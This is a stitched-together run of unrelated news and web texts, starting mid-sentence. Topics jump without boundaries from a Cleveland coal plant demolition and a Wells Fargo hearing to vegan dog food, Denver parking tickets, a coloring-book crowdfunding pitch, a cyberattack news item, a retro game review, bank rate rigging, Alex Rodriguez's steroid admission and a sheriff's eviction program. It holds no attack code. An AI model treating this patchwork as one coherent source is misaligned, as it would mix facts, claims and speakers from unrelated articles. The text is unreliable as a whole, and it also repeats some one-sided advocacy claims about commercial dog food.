But they said no such potential exists at the Lake Shore plant.
FirstEnergy closed the coal-fired plant, parts of which are a century old, rather than upgrade pollution control equipment to remove mercury and other toxic substances from smokestack emissions as required by new federal regulations.
Consequences of closing
As soon as the facility was no longer burning coal and producing heat, pipes and downspouts froze during winter months, heavily damaging its major coal-burning structures, they said.
"Once you deactivate, you basically compromise" the plant, said Mark Vindivich, a FirstEnergy engineer leading the demolition process. "When there's no heat, [roof drains] freeze and burst. Water just comes down through the plant."
FirstEnergy hopes to begin a $15 million demolition in late spring or early summer, and then to offer the 57-acre site for sale.
The utility hasn't set a price or devised a plan to market the property, said spokeswoman Jennifer Young.
Contractors from Bet-Tech Construction Inc. in Aliquippa Pennsylvania, and Independence Excavating in Independence would use standard procedures including sprayed water to suppress dust from the demolition, and materials would be recycled, Young said.
Cleaning the site
She and other FirstEnergy officials said the utility would remove the top 2 feet of soil from the site and grade the property so it drains toward its former water treatment ponds, without creating puddles or swampy areas.
The utility would cap the land with fresh topsoil, plant it with grass, and await offers from buyers.
Existing roads and rail spurs would remain, as would a "screenhouse" that prevents floating debris from entering the plant's water intake canal, which connects directly to Lake Erie via twin channels underneath the Shoreway.
FirstEnergy would also continue to operate a 13-acre facility south of the main plant, where it will operate newly completed high-voltage transmission line equipment.
As it stands, Lake Shore is a brawny collection of conveyors, rail lines, coal furnaces and water treatment facilities, sandwiched between rail lines to the south and the highway to the north.
Architectural power
At the heart of it all is a massive turbine room of the facility's A Plant, built in the 1940s, with an interior that resembles a cathedral devoted to electricity, albeit one that's crumbling.
"Mother Nature is taking its course on the building," said Joseph Cerer, a FirstEnergy technical services engineer.
He pointed to spots high overhead in the turbine room where glazed, yellow-colored ceramic blocks had peeled away from an underlying steel column.
Cerer also pointed to nets installed underneath the turbine room's massive steel roof trusses to catch falling debris.
"I've spent a lot of time trying to make everything safe," Cerer said.
Despite such conditions, FirstEnergy can't proceed with demolition because the city's Downtown/Flats Design Review Committee tabled the company's request in December for a demolition permit, saying that the utility hadn't provided enough information.
Still seeking a permit
Talks between the utility and the city are underway.
City Planning Director Freddy Collier said Wednesday that the city initially felt the facility had the potential to be preserved and reused.
But Collier said the utility has made what he called "a compelling case" in favor of demolition at Lake Shore.
The planning director said "we'll know more definitely about the prospect of demolition or salvaging or anything of that nature" after he tours the site.
For now, he views the plant as a "win-win" no matter what happens, because demolition would create a 57-acre development site overlooking the lake.
"This is not a bad thing, regardless of how it turns out," he said.
Collier said the city hasn't contemplated buying the site, but is keenly interested in its potential, given its proximity to the lakefront and nearby Gordon Park, located just to the east across East 72nd Street.
David Beach, director of the Cleveland Museum of Natural History's GreenCityBlueLake Institute, said "the worst thing would be for the site to linger as a brownfield for a long time."
He said potential uses "could range from green space to residential development to even some kind of creative industrial redevelopment, given that the site is in an industrial corridor with rail access."
Neighborhood concerns
Residents of Quay 55, the apartment complex that occupies a renovated warehouse atop a pier north of the Shoreway at East 55th Street, said at a meeting Tuesday night that they'd like to "see mixed use and retail much like the East Bank of the Flats," said Joseph Giuliano, president of the Downtown Cleveland Residents Association, which convened the meeting.
The residents also expressed concerns about whether FirstEnergy would leave the site free of environmental hazards, Giuliano said.
Young said that FirstEnergy "has maintained Lake Shore in accordance with all local, state and federal environmental permits and requirements both during operation and in its current decommissioned state."
She said the utility would allow potential buyers to conduct additional soil tests or perform the tests itself if asked.
In each stage of the demolition and preparation of the site, Young said, FirstEnergy has one primary concern: safety.
WASHINGTON — The more the chief executive of Wells Fargo tried to explain, the more skeptical the senators became.
For more than two hours testifying before the Senate Banking Committee on Tuesday, John G. Stumpf expressed regret that Wells Fargo had created as many as two million bogus bank and credit card accounts without its customers' consent. He apologized for failing to stop the illicit behavior sooner, and vowed to make amends.
Some of the senators on the committee scoffed. Mr. Stumpf, they said, was offering little more than platitudes while allowing his top executives to avoid any real consequences — like being fired or having their enormous pay packages clawed back.
Instead, the bank's lowest-paid workers have borne the brunt of the punishment, the senators noted. Senior management, they said, seemed to ignore this practice because it helped turn the bank into a profit machine.
Adopting a vegan diet is a way for people to separate themselves from an industry that exploits and kills billions of animals every year. But what about the diets of our canine companions?
Like humans, dogs are omnivores (not carnivores) and can thrive on a well-balanced and nutritionally complete vegan diet. All of a dog's nutritional needs can be met through plant and mineral sources, and there are several brands of vegan dog food formulated to give your canine companion everything he or she needs.
Vegan dog food makes even more sense once you consider that most mass-market dog food contains animal products that cannot legally be sold for human consumption—sometimes even flesh from diseased or cancer-ridden animals. By contrast, vegan dog food is typically made from healthy, wholesome ingredients. Additionally, veterinarians frequently recommend vegan diets for dogs afflicted with allergies. Below you will find some great vegan dog food options.
Vegan Dog Food:
Vegan Dog Treats:
Simple Vegan Dog Treat Recipe:
As with any diet change, if you decide to transition your dog to a vegan diet, please consult your vet. There are a few large dog breeds that may require additional supplementation of the amino acids taurine and L-carnitine, which can be easily purchased at any health food store. You can also find helpful resources at vegepets.info and veganvet.net.
Please enable Javascript to watch this video
DENVER -- Not paying the parking meter in Denver is high risk, with little reward for drivers but a big reward for the city when you add up all the tickets issued.
FOX31 Denver looked back through the numbers from 2015 to see where drivers got the most tickets in the city.
Top 5 Areas
Market Street in LoDo: 24,324 tickets
24,324 tickets Court Place: 7,295 tickets
7,295 tickets Fillmore Street, including Cherry Creek North area: 5,377 tickets
5,377 tickets Convention Center Parking Garage, 14th Street: 3,136 tickets
3,136 tickets Denver International Airport: 2,587 tickets
Zoom in and click markers for details on each location in the top five areas.
Parking ticket money
Meter maids are officially called "Right of Way Enforcement Agents" in Denver. In 2015, they handed out 658,900 tickets.
With only 65 agents, that works out to more than 10,000 tickets per agent.
In total, the city collected $30 million in parking tickets during 2015.
The total made from meters filled legally: $11 million. That's less than one-third of what the city took in from parking tickets.
Full list
See all the data from the top five areas.
* NEW * ALL backers who reserve their hard copy of the book will now receive the digital version, featuring poster size print outs as well!
*Ask me About International Shipping
The Specs
- 32 pages of highly detailed original artwork
- Sturdy 100lb paper stock ideal for heavy mediums like watercolors or inks
- Acid Free, white paper for ideal artwork preservation and appearance
- Perforated one sided pages, which allow you to frame your creations
- Access to all the digital files, ideal for Adobe Suite Illustrating or
limitless printing of poster size versions
- Access the digital gallery where artists can share their artwork
The Story
For the last decade I have been creating complex, surreal artwork and illustrations. (www.somaink.com). All along this journey, people have asked me time and time again, "Hey man, Could you print a copy of that drawing for me to color in myself?!", and for years, I would oblige people here and there. But recently more and more people have asked me to put something together with more substance and detail.
The answer? Creating a high quality, 32-page coloring book featuring my beautiful black and white line artwork . composed from a selection of my most detailed and complex illustrations.
I hope to include a range of illustrations, all of which are in the loose theme of surreal, psychedelic and contemporary pop-art with predominant themes of nature, animals, spiral and fractal geometry and complex layers for endless colorizing outcomes.
...And for a mere $20 you can reserve your very own hard copy, and digital print!
Available in hard-copy or digital:
High Quality, Acid-Free, 8.5x11 inch, 32 highly detailed, Tear-out, frame-able pages.
The Digital Edition which can be either printed or colored on the computer.
This book will be 32 pages of high detail, high quality artwork, ready to be illustrated however you see fit. Even assuming that each page takes about an hour to color, that would mean for $20 you get 32-100 hours of enjoyment. What sort of entertainment is that cheap these days?
Just Add A Little Color
I have seen many coloring books, and I am sure the first thing that comes to most people's minds is a thin, newsprint paper, stapled booklet for children to color with crayons. This is not the type of coloring book I would like to see. I want each black and white illustration to be on individual pages of high quality, acid-free, sturdy white paper, so that people can use colored pencils, ink, markers, pastels or even paints on each page in order to create their own masterpieces.
The book will be also be linked to an online photo gallery in the hopes of spurring collaboration and inspiration. Each page will be one sided and sturdy enough to be saved or framed.
LOGISTICS: I am asking for your help to raise enough money to print the first edition of this coloring book. However if less than 1,000 are printed the price increases dramatically to nearly $12 dollars per book. Another cost that must be factored in, is shipping. The books will cost several dollars to ship from the printing house to my doorstep, and then yet again, there will be shipping to each backer as well.
The size of the first edition printing will be dictated by how many backers we have, and how many books are spoken for, through the various backer rewards . Then I will shoulder the cost for shipping and fulfillment in the interim, and use the additional copies of the books to sell, and then repay myself (*as of day 18 the shipping costs are at over 1,200$, which is great, because it shows a strong grassroots interest in the book.)
All this could potentially raise the cost to nearly $16 per book in materials and fulfillment alone. So I wanted to offer you all some extra incentives for your support. These incentives range from a digital copy of my work, which may be printed as many times as you'd like (not for profit unless I am informed and consent), to original artwork (some of which has been sold for hundreds of dollars in the past), to extra bonus material and personalized messages in your coloring book.
It will feature a semi-gloss, color cover and a back cover featuring a thumbnail gallery of all the original full color versions. I want this to look and feel like a high quality book, worthy of watercolors, Primsacolor pens, colored pencils...or crayons (if you're feelin' old school). But this is NOT a child's coloring book.
THE ARTWORK:
Imagine the level of detail, texture you could add to the open spaces. These images were designed for color illustration, and were planned out so that there would be a wide range of possibilities for colorizing.
This once looked like...
This
This can become....
this!
You can transform simple lines like this....
Into Something, like this:
If you or someone in your life loves to draw, color or doodle, then this is the book for you. Create your own works of art by coloring within the lines, or by building off the artwork I have provided and create an all new masterpiece. However you choose to tackle this coloring book, it is guaranteed to provide countless hours of entertainment and satisfaction.
More Samples of just a few of the 32 pieces I've selected
Help me, help you Color The World!
Thank you.
WASHINGTON (Reuters) - The New York Times said on Tuesday its Moscow bureau was targeted by a cyberattack this month but that there was no evidence the hackers, believed to be Russian, were successful.
The sun peaks over the New York Times Building in New York August 14, 2013. REUTERS/Brendan McDermid
“We are constantly monitoring our systems with the latest available intelligence and tools,” Times spokeswoman Eileen Murphy told the newspaper. “We have seen no evidence that any of our internal systems, including our systems in the Moscow bureau, have been breached or compromised.”
Earlier on Tuesday, CNN, citing unnamed U.S. officials, reported that the Federal Bureau of Investigation and other U.S. security agencies were investigating cyber breaches targeting reporters at the Times and other U.S. news organizations that were thought to have been carried out by hackers working for Russian intelligence.
“Investigators so far believe that Russian intelligence is likely behind the attacks and that Russian hackers are targeting news organizations as part of a broader series of hacks that also have focused on Democratic Party organizations, the officials said,” CNN reported.
The FBI declined a Reuters' request for comment. Representatives for the U.S. Secret Service, which has a role in protecting the country from cyber crime, did not reply to a request for comment.
A government official briefed on the inquiry told the Times the FBI was looking into the attempted cyberattack but was not carrying out similar investigations at other news organizations.
The Times had not hired outside firms to investigate the attempted intrusion, contrary to the CNN report, Murphy said.
News of the cyberattack comes amid a wave of similar attacks targeting major U.S. political parties that have surfaced in recent weeks ahead of the Nov. 8 presidential election.
The Democratic National Committee, Democratic presidential nominee Hillary Clinton's campaign and the party's congressional fundraising committee have all been affected.
Hackers have also targeted the computer systems of Republican presidential nominee Donald Trump and Republican Party organizations, sources have told Reuters.
A breach at the Times would not be the first time foreign hackers infiltrated a news organization. Media are frequently targeted in order to glean insights into U.S. policies or to spy on journalists.
In 2013, a group of hackers known as the Syrian Electronic Army attacked the Times and other media outlets. Chinese attackers also infiltrated the Times that year.
Hello everyone, and welcome to another edition of “Retro Game Retrospective” featuring Kris “Xanfan” Lane! For this weeks review, I have decided to tackle the 16 bit era for the first time, and review the game that got me started with the entire first person driving simulation genre. The “Test Drive” series always seemed to take a backseat from the “Need For Speed” franchise, even though the first game in the “Test Drive” series was a introduced 7 years previously. The game of the series that I am reviewing today is “The Duel: Test Drive II”, the first of the series to be offered not only for the various computer systems of the day, but for home consoles as well.
The version that I am going to be more bias on is the edition for the Sega Genesis, since that's the version I grew up with. (An SNES version was also available.) Released in 1990, “Test Drive II” was finally an opportunity to drive cars, that chances are, you will never be able to afford. Seriously. How often have YOU gotten behind the wheel of a Ferrari F40, a Porsche 959, or a Lamborghini Diablo? And not only that, but even if you ever DO get the chance to drive or even own one, let's face it. How often are you going to be able to get them to go as fast as they are capable of going? (At least legally in the US?) This game was the perfect simulation of the time, since you could crash them as often as you could, without the expensive repair costs. The most “money” that you'll ever put out in this game is when you have to stop for gas at the end of the race. (I think stopping at a gas station was a very interesting way of saying the term was over, instead of just crossing a finish line. With names like “Gas In A Flash”, it's more realistic!)
I use the term “simulation” for a very simple reason. Unlike most first person car driving games of the era, where you are either on a race track doing laps with other vehicles, or going from point A to point B on a single stretch of road, where all the cars are driving in the same direction, “Test Drive II” gave you a (for the time), quite realistic driving experience on a typical roadway, complete with vehicles driving in the opposite direction, bumps in the road, street signs on the side of the road, the ability to drive an automatic or manual transmission, and of course, the police. Getting pulled over by the cops (if you can't outrun them, that is,) will cause time to be lost in the race, as well as a lost life. (I don't care if it's in a game or in real life. There's no downer quite like getting a speeding ticket.) Of course, with the built-in radar detectors in all 3 vehicles, you should have no problem learning where they are! (And if you get caught, you won't have to drive over the radar detector like you would have to in Virginia!)
The first time I played this game, I remembered how it was a very amazing game. Just like driving a real car, you will not want to take your hands off of the controller. I can recall having to scratch my nose doing 200 kPH in a Ferrari, and crashing because of it. I crashed into oncoming traffic, and the looks on the faces on the other car, where a fantastic combination of shock and annoyance, just like in real life. My mother even told me that you always need to pay attention, and never take your eyes off the road. At that point at the age of 13, I was thinking to myself that the DMV should be requiring that people play this game instead of taking an actual road test! Just replace the Genesis controller with an actual steering wheel and pedals and you'll be all set.Looking back however, it looks like I may have been slightly shortchanged with the title. For the first time, recently, I was given the opportunity to play the Super Nintendo version of the same game, and I have to say, it seems to over shine the Genesis version in a few aspects. The Genesis version frame rate, when compared to the Super NES edition, is terrible. The SNES game plays a lot smoother and makes it a better experience in that aspect. However where the SNES offered more smooth rapid paced graphics, the Genesis scenery backgrounds looked much more realistic to me. The main issue with the Genesis graphics is when you accidentally fall off of a cliff. (Who the hell decided not to put guardrails up?) When you fall off a cliff, you just see beige. No detail whatsoever. Yawn. So you'd have to make your own decision on which is more important: Better graphics (other than tumbling to your death) or smoother game play. And if you can't choose between one or the other, ponder this one: The SNES version also includes bugs that get smashed on your windshield!
The music for the Genesis version is bountiful and always playing in the background, whether you like it to or not. Whereas on the SNES version, there is only the sounds of the cars engine and the radar detector. The game just goes from one major extreme to the other! The music from the Genesis version is perfectly fine, however the loop plays continuously from the time that the game title screen starts up to the time that the game is turned off. Eventually you hear the same music over and over again. An option to turn the music off would have been a nice touch. (Heck, even “Rad Racer” for the original NES had 3 different “radio stations” to pick from… Why couldn't that have been done of the Sega Genesis version?) Same situation, music should have been an option for the SNES cartridge. There's only so much gear shifting you can hear before you start wishing you could drown it out with the cassette deck playing some Technotronic.
Like I said at the beginning, this was the first version of the game series that was offered on consoles as well as computers. “Test Drive II” was also made available for computers such as the Macintosh, Atari ST, Commodore 64, DOS based PCs, Apple II and the Commodore Amiga. I personally have never played any of the computer versions. (However, being the owner of at least a few old Macs, an Apple IIGS and an Amiga, I really want to try them out now.) From what I've seen, it would appear that out of the computer versions, the Commodore Amiga is where the game really seems to shine. Excellent graphics and response times, music emulation that comes from one of the very best when it comes to computers of the time, and of course, the ability to expand. The console versions have 3 cars and 4 sceneries, where the computer versions come with 2 cars and 1 scenery. But, expansion packs to increase those figures to at least 10 cars and 5 types of scenery were released on diskette. Obviously, these aren't an option with Genesis and SNES versions.
The “Test Drive” series is about to enter it's eleventh game of the series next month, with the release of “Test Drive: Ferrari Racing Legends”. Over the years, graphics have gotten photorealistic, the music is actual music that you could hear on an iPod or CD, the controllers have more buttons to give it more of a muscle car feel, etc. However the original charm of the first few games of the series are just nothing short of amazing. All in all, if you are looking for a fun game to pass some time, would like the chance to drive a car that can cost you more than a mortgage, or want to practice your police evading skills (gaming only, of course), then “Test Drive II” might just be your ticket (no pun intended). There was a time in the mid to late 80s where the computer companies were trying to disuse the word “game” and move it over to the word “simulation”, since computers “Weren't supposed to run games, but instead run simulations”. Call it what you want, this is one of the most realistic of the era. (Just, don't scratch your nose like I did… No reason to crash the Ferrari because you can't help yourself.) Buckle up!
[youtube http://www.youtube.com/watch?v=fIZkxLy8Btc]
Mr. Pollack said Fierman was not admitting that it had violated any laws or fired Ms. Valencia. He said the company considered the health and safety of its employees “to be of utmost importance.”
“We believe that this situation resulted from an unfortunate misunderstanding and Fierman intends to comply with all applicable legal requirements,” said Mr. Pollack, who provided a copy of the letter to The New York Times on Monday.
Leo Servedio, a union representative for the Teamsters Local 202, which represents Fierman workers, said he had spoken to Ms. Valencia's doctor in July and was told that her pregnancy was not high risk.
He said she returned to work with a note from her doctor that said she could work full duty and he shared that information with the company. She said her colleagues agreed to handle the heavy machinery and lifting.
Ms. Valencia said she felt so ill after working two days of overtime that she went to the hospital and to see her doctor about a week later. The doctor wrote a letter deeming her to be a high-risk pregnancy and telling her not to work overtime, which she gave to her bosses. “That's peculiar,” said Mr. Servedio, who added that she never gave him the note.
In Rolling Stone, the amazing Matt Taibbi documents a breaking price-rigging scandal involving the world's biggest banks. The $500 trillion conspiracy to game the interest-rate swaps victimizes every city, town, state and nation that uses bonds to raise money, diverting an unimaginable sum from tax coffers to the pockets of mega-rich bankers. If you've been staring around at the empty storefronts, closed libraries and schools, homeless and breadlines since 2008 and wondering "Where did all the money go?" then wonder no longer.
Though interest-rate swaps are not widely understood outside the finance world, the root concept actually isn't that hard. If you can imagine taking out a variable-rate mortgage and then paying a bank to make your loan payments fixed, you've got the basic idea of an interest-rate swap.
In practice, it might be a country like Greece or a regional government like Jefferson County, Alabama, that borrows money at a variable rate of interest, then later goes to a bank to "swap" that loan to a more predictable fixed rate. In its simplest form, the customer in a swap deal is usually paying a premium for the safety and security of fixed interest rates, while the firm selling the swap is usually betting that it knows more about future movements in interest rates than its customers.
Prices for interest-rate swaps are often based on ISDAfix, which, like Libor, is yet another of these privately calculated benchmarks. ISDAfix's U.S. dollar rates are published every day, at 11:30 a.m. and 3:30 p.m., after a gang of the same usual-suspect megabanks (Bank of America, RBS, Deutsche, JPMorgan Chase, Barclays, etc.) submits information about bids and offers for swaps.
And here's what we know so far: The CFTC has sent subpoenas to ICAP and to as many as 15 of those member banks, and plans to interview about a dozen ICAP employees from the company's office in Jersey City, New Jersey. Moreover, the International Swaps and Derivatives Association, or ISDA, which works together with ICAP (for U.S. dollar transactions) and Thomson Reuters to compute the ISDAfix benchmark, has hired the consulting firm Oliver Wyman to review the process by which ISDAfix is calculated. Oliver Wyman is the same company that the British Bankers' Association hired to review the Libor submission process after that scandal broke last year. The upshot of all of this is that it looks very much like ISDAfix could be Libor all over again.
"It's obviously reminiscent of the Libor manipulation issue," Darrell Duffie, a finance professor at Stanford University, told reporters. "People may have been naive that simply reporting these rates was enough to avoid manipulation."
And just like in Libor, the potential losers in an interest-rate-swap manipulation scandal would be the same sad-sack collection of cities, towns, companies and other nonbank entities that have no way of knowing if they're paying the real price for swaps or a price being manipulated by bank insiders for profit. Moreover, ISDAfix is not only used to calculate prices for interest-rate swaps, it's also used to set values for about $550 billion worth of bonds tied to commercial real estate, and also affects the payouts on some state-pension annuities.
So although it's not quite as widespread as Libor, ISDAfix is sufficiently power-jammed into the world financial infrastructure that any manipulation of the rate would be catastrophic – and a huge class of victims that could include everyone from state pensioners to big cities to wealthy investors in structured notes would have no idea they were being robbed.
Alex Rodriguez admitted to the use of performance-enhancing drugs during a meeting with the Drug Enforcement Administration in January, DEA documents show.
A lawyer for former University of Miami pitching coach Lazaro "Laser" Collazo, who is charged with conspiracy to distribute PEDs, told The Associated Press that Rodriguez confessed to steroid use, citing DEA documents provided by the government to defense attorneys.
The Miami Herald, citing a written "report of investigation," earlier reported details of Rodriguez's admission Wednesday morning. Two sources confirmed details of the Herald's report to ESPN.
Editor's Picks How should the New York Yankees handle the Alex Rodriguez situation going forward? Buster Olney has an idea. Story
Story O'Connor: A-Rod shouldn't bother apologizing If Alex Rodriguez wants to win fans back, there's a clear path to redemption.
Is there any adult who has followed Alex Rodriguez's case who thought for a single minute that he hadn't used PEDs, asks Wallace Matthews. Story 2 Related
The Herald reported that the recently reinstated New York Yankees slugger met with DEA agents on Jan. 29 at the agency's South Florida field office. Given immunity from prosecution, Rodriguez told investigators he had used banned substances between late 2010 and October 2012 -- including testosterone cream, testosterone gummies and HGH -- supplied by Anthony Bosch, who owned the Biogenesis of America clinic in Coral Gables.
According to the report, one such injection took place in the men's room of a Miami nightclub.
"Rodriguez injected the HGH into his stomach," the DEA report stated, according to the newspaper. "Rodriguez said Bosch told him the HGH would help with sleep, weight, hair growth, eyesight and muscle recovery."
According to the report, Rodriguez was trained in tricks to beat a urine test.
"Bosch advised him to only use mid-stream urine for MLB drug testing," the DEA report stated, according to the newspaper. "Bosch told Rodriguez not to use the beginning or the end urine stream."
Bosch has pleaded guilty in the case and is cooperating with the prosecution.
Rodriguez has publicly denied any use of banned substances during his time with the Yankees, which began in 2004. In 2009, the Yankees third baseman admitted to using PEDs while with the Texas Rangers in 2001.
Major League Baseball commissioner Bud Selig suspended Rodriguez for 211 games in August 2013 for violations of the sport's drug agreement and labor contract. The penalty was cut to the 2014 season in January by arbitrator Fredric Horowitz.
Rodriguez proclaimed his innocence and sued in federal court then withdrew the suit and accepted the penalty.
The Herald reported Bosch told the DEA that A-Rod agreed to pay for steroids for 20 Biogenesis customers after the clinic closed to keep Bosch from talking about his involvement.
That could prompt MLB to investigate whether Rodriguez could be suspended again under the sport's drug agreement for violations related to the sale and distribution of PEDs, which are separate from the prohibitions on personal use.
Alex Rodriguez was reinstated at the end of the 2014 season after serving a suspension. Kim Klement/USA TODAY Sports
Asked about Rodriguez's documented admission, his lawyer, Joe Tacopina, said in a text message to ESPNNewYork.com: "Grand jury secrecy laws ... which appears to have been violated ... prevents me from answering one way or the other."
Attorney Frank Quintero Jr., who represents Collazo, told the AP that he has a copy of the DEA documents but cannot release it under federal evidence rules.
"I can for your report confirm that the report by the Herald is accurate as to what Rodriguez said," Quintero said in an email. "I don't have a dog in this fight. My client has no involvement with ANY major league players concerning the use of banned substances."
The Herald's report comes a week after court filings revealed that Rodriguez paid his cousin Yuri Sucart nearly $1 million in exchange for Sucart's silence regarding Rodriguez's illegal PED use.
Neither the DEA nor the Miami U.S. Attorney's Office commented on the report. However, in a separate public court filing, prosecutors made clear that Rodriguez would be a star witness if the case against Sucart and others goes to trial. It is set to begin Feb. 9 in Miami federal court.
"Rodriguez has a prominent role in the government's proof of the ... conspiracies to distribute testosterone and human growth hormone," the prosecutors wrote.
Rodriguez told agents it was Sucart who introduced him in 2010 to Bosch, who falsely posed as a physician nicknamed "Dr. T." Rodriguez paid mainly in cash and Bosch promised secrecy, although he would eventually begin to cooperate with MLB and federal investigators. From the DEA report, the Herald said Rodriguez admitted he also helped pay for Bosch's criminal defense, including $25,000 as a down payment to retain one attorney.
In total, 14 MLB players were suspended last year following the Biogenesis investigation. None have been charged with crimes.
Rodriguez, who turns 40 next summer, played in just 44 games in 2013 and hit seven home runs to increase his total to 654, fifth on the career list. He is owed $61 million for the final three years of his contract with the Yankees. He could receive an additional $6 million each for five milestones that the team designates as historic achievements.
Don Hooton, whose Taylor Hooton Foundation (named for his son) Rodriguez pledged to help in spreading the anti-steroid message to children, said he felt betrayed by Wednesday's news.
"We helped provide him a very credible platform for him to do his mea culpa and demonstrate to the public by speaking with kids that he learned the error of his ways, that he was giving back and making amends," Hooton, who was present for Rodriguez's 2009 news conference, told ESPNNewYork.com's Ian O'Connor. "And now it looks like that mea culpa and last apology weren't very genuine.
"I'm very, very disappointed but not surprised after all of the revelations that have come out across the past several months. After the press conference in 2009, I had Alex out with literally thousands of kids from Miami to New York doing programs at Boys & Girls Clubs, high schools and middle schools. If his admission is accurate, his messages to kids about learning his lesson and playing performance-enhancing-drug free were disingenuous to say the least."
Information from ESPNNewYork.com's Andrew Marchand and The Associated Press was used in this report.
Earlier today on MSNBC, Senator Bernie Sanders said the Democratic party needs a “top-down overhaul” to actually become a grassroots party.
He said, “The Democratic Party today, programmatically, in terms of how it does business, has failed. I mean, the evidence is obvious. It's not just that we've lost the White House and the U.S. Senate and the U.S. House. We've lost 900 legislative seats in the last 8 or 9 years.”
He said the Democrats need to become grassroots instead of so beholden to corporate interests.
MSNBC's Greta Van Susteren played that snippet from Sanders's interview for former DNC chair Debbie Wasserman Schultz, who had this to say in response:
“Respectfully, to Senator Sanders, we are already a grassroots party. I mean, if we were not, we would not have been able to help bring down the absolutely abhorrent health care repeal bill… It's actually more like semantics. We all agree that we should be and we are a grassroots party that focuses on making sure that we can help people reach the middle class.”
Watch above, via MSNBC.
[image via screengrab]
— —
Follow Josh Feldman on Twitter: @feldmaniac
Have a tip we should know? tips@mediaite.com
Modern game design focuses on player freedom, player choice, and making the emotional responses of the player part of the interactive experience. A good game doesn't push you toward a particular viewpoint. A good game allows you to decide that viewpoint for yourself interactively. This means that we can't assume video games cultivate perceptions of social reality the same way that television does: video games hinge on a give and take between player attitudes and messages delivered by the game. Player choice short circuits cultivation theory because the player, to an extent, creates his or her own meaning.
True player choice allows the player the option to do things that are morally wrong. However, if a player doesn't think it's fun to act like a jerk in a game, they're not going to. There is huge debate in video games about how real choice versus perceived choice works. Some believe that creating consequences for particular behaviours is not ideal because then players make choices based on desired results, not raw morality. Other developers believe that choices are meaningless if they result in no impact on the game world or the player's experience. It's complex game design philosophy that doesn't exist in any other entertainment medium.
The experience of playing a game and the experience of watching a game aren't the same thing, which undermines gaze theory - the idea that camera angles simulate the distinctly gendered perspective and experience of a viewer.
A TV viewer feels no responsibility for the characters in a show. In a game, I feel greater responsibility for not harming the character I'm controlling, and this leads to very different reactions between player and viewer. For instance, we've all seen scenes in TV shows where a character is beaten to bloody death with a golf club, but it's a totally different experience for a player to be forced to beat Andrew Ryan to death with a golf club on command in Bioshock. Ryan's words might actually summarize the difference: "A man chooses. A slave obeys." But a slave also has no accountability for what they do. Gaze theory requires the audience to be a spectator. In video games, the player is a participant. This doesn't mean that a participant is not a spectator as well. It just means, without getting technical, that they're a spectator and more, which changes the variables significantly.
A game that utilized this principle of participation with accountability to maximum impact is the Minority Media puzzle adventure game Papo & Yo. Papo & Yo doesn't use a health bar. The main character, a little boy named Quico, can't "die" in game. But once I realized that the game is a metaphor for child abuse by an addict parent, I became highly invested in minimizing the amount of damage Quico took. I was hyper-aware that I could control Quico's safety as a player, but Quico could not control it as a character. The in-game consequence was emotional, not literal. This is why Minority Media calls their products empathy games.
Fortunately, Feminist Frequency has Papo & Yo on their list of recommended games, even though it's a story about a boy and his father with only one mystical female character who exists only to further the story of the male protagonist. It would be nice if Feminist Frequency was equally forgiving with other games that attempt to make a player feel kinder things as well. Assassin's Creed's anti-racism and anti-sexism messages deserve kudos, as does Dishonor's anti-violence moral. Watch_Dogs also shows human trafficking to be a really bad thing. However, all these games were criticized by Feminist Frequency for promoting sexism using imagery pulled out of the context of the games.
To recap (because this stuff is confusing) video games give a player agency in fictional realities in a way that TV shows don't provide a viewer. As a TV viewer, you feel bad when a child is abused. When you are given control of an abused child in a video game, you feel responsibility and guilt for failing to protect that child. This player agency wreaks havoc on traditional cultivation theory: instead of a passive viewer, the player is an actor that participates in choices. When those choices are denied the player, they must be denied very deliberately. As players in video games, we become defined and self-define by these choices, and struggle with frustration when we're forced into things we don't want to do. For instance, Assassin's Creed Rogue forces the player to assassinate a popular character as a way of encouraging the player to question the morality of the Assassin/Templar binary. It's gut-wrenching, reluctant gameplay, and it's supposed to be.
Deputy Robert Aviles, armed with a clipboard and brightly colored paperwork, approaches the porch where a straw welcome mat bears the black-lettered inscription, “Don't even think about it.” His partner, Kevlar-clad Deputy Paul Woehl, hangs back several feet as Aviles raps on the white door to deliver the bad news.
“Sheriff's Office,” he announces.
A disheveled middle-aged woman answers and, after a brief exchange, beckons the officers inside. They follow her to the musty hallway, where another tenant appears from the back. The floors are strewn with clutter—hypodermic needles, heaps of junk mail, rumpled-up blankets. Translucent orange pill bottles sit atop end tables and an old player piano. Christian religious art adorns the walls.
“As of right now, as you know, the eviction is scheduled for the 25th,” Aviles breaks it to them. “That's probably going to be the for-sure day. So make sure you stay in touch with your social workers. Has anyone moved out?”
Another tenant chimes in, telling deputies that they expect to move into a new place called “the purple house.” Aviles nods and takes notes.
“I need you to stay in touch with your social workers,” he repeats, trying to calmly convey the urgency of the predicament. “Can you do that? Because you have until the 25th, remember, and that probably won't get extended again. OK?”
“Oh” the housemate replies, “is that right?”
“Yeah, that's usually that's the max number of days that they give,” Aviles says.
“What do you mean to say?” she asks, anxiety creeping up in her voice as she wrings her hands. “It won't be extended anymore?”
“It probably will not be extended,” Aviles tells her apologetically. “Do you have any questions for me?”
“How about if we don't have a place to go?” she wonders. “Where will we go?”
“That's what we're working on,” Aviles reassures her. “I don't know all the alternatives, so I have some people looking into that. They may come and talk to you also. But hopefully we'll get something figured out.”
Aviles says he bought as much time as he could for the women left in the single-story flophouse, which the landlord subdivided to accommodate several mentally ill tenants. Serving the eviction as scheduled a month prior would almost certainly have left some of the home's occupants on the streets.
“Last time we were here, a few didn't even know that the landlord wanted them out,” Aviles tells me as we walk away from the tan stucco home on a quiet street in San Jose's East Side. “We put up the notice, but I think somebody tore it down. If we went through with business as usual that day, the landlord would have been there with the locksmith, forced them out and that would be it”
Not anymore. Not if he can help it.
Seven years serving eviction notices for the Santa Clara County Sheriff's Office haven't made it any easier for Aviles to tell someone they have to leave. Especially for the single parents, the children, the mentally ill and countless others who could have been helped at some earlier point in the series of events that pushed them to the brink. Knowing that too many evictions could have been prevented or at least alleviated inspired him to create what he calls the Displacement Mitigation Team.
“This is a way to catch people who are not able to advocate for themselves,” says, a 15-year Sheriff's Office veteran who expects to get reassigned to patrol in 2017.
Aviles began to assemble the task force earlier this year and formally deployed it for the first time in September. The idea stems from a counterpart in San Francisco, where deputies enforcing evictions link vulnerable tenants to social services instead of casting them out on the streets. He pitched the idea to his boss at the time, Lt. William Middleton, and Sheriff Laurie Smith, who told him to run with it.
“The concept is simple,” says Middleton, who recently stepped down from leading the civil services unit. “But it really does go above and beyond.”
Under California law, only sheriff's agencies can enforce civil procedures. That includes evictions, which begin in court as lawsuits called unlawful detainers. A judge weighs the evidence to determine whether a tenant has violated a contract with the landlord. If so, they issue a writ that a sheriff's deputy is mandated to post within three days and enforce less than a week later.
